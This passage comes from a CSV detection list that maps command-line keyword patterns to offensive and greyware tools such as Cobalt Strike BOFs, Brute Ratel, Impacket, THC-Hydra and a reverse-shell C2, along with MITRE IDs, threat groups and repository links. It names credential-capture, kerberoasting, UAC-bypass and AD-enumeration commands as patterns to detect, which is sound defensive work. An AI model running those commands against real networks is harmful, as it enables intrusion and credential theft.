APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"etw stop","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"EVUAC *","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","0","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"exploit -j -z","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"fw_walk display*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"fw_walk status*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"fw_walk total*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"Get-ADComputer -Filter {TrustedForDelegation -eq $True}","greyware_tool_keyword","powershell","AD Module Enumerate computers with Unconstrained Delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-ADGroup -Filter *Name -like *admin*","greyware_tool_keyword","powershell","AD Module Search for a particular string in attributes (admin)","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-ADObject -Filter {msDS-AllowedToDelegateTo * -Properties msDS-AllowedToDelegateTo*","greyware_tool_keyword","powershell","AD Module Enumerate principals with Constrained Delegation enabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-ADObject -SearchBase *CN=Shadow Principal Configuration*CN=Services* (Get-ADRootDSE).configurationNamingContext) | select *msDS-ShadowPrincipalSid*","greyware_tool_keyword","powershell","Enumerate shadow security principals mapped to a high priv group","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth","greyware_tool_keyword","powershell","AD module 
Enumerate users","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-ADUser -Filter {TrustedForDelegation -eq $True}","greyware_tool_keyword","powershell","AD Module Enumerate computers with Unconstrained Delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"get-delegation *","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"get-delegation *","offensive_tool_keyword","DelegationBOF","This tool 
uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"Get-DomainComputer -TrustedToAuth","greyware_tool_keyword","powershell","AD Module Enumerate principals with Constrained Delegation enabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-DomainUser -TrustedToAuth","greyware_tool_keyword","powershell","AD Module Enumerate principals with Constrained Delegation enabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-GPO -All","greyware_tool_keyword","powershell","AD Module GroupPolicy - List of GPO in the domain","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-NetGroup -FullData*","greyware_tool_keyword","powershell","Find groups in the current domain (PowerView)","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"getprivs","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 
- T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"get-spns *","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"grab_token *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"Impacket *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"impersonate *\*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"import boko*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"inceptor*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"kerberoast *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"koh exit*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"koh list*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"Ladon *-* *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"Ladon *.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"Ladon */* *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"Ladon Mac * ","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"Lapsdump *","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"ldapsearch -h * -x*","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"LdapSignCheck *","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP 
signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","0","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"ldeep *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"list_exports *.dll*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 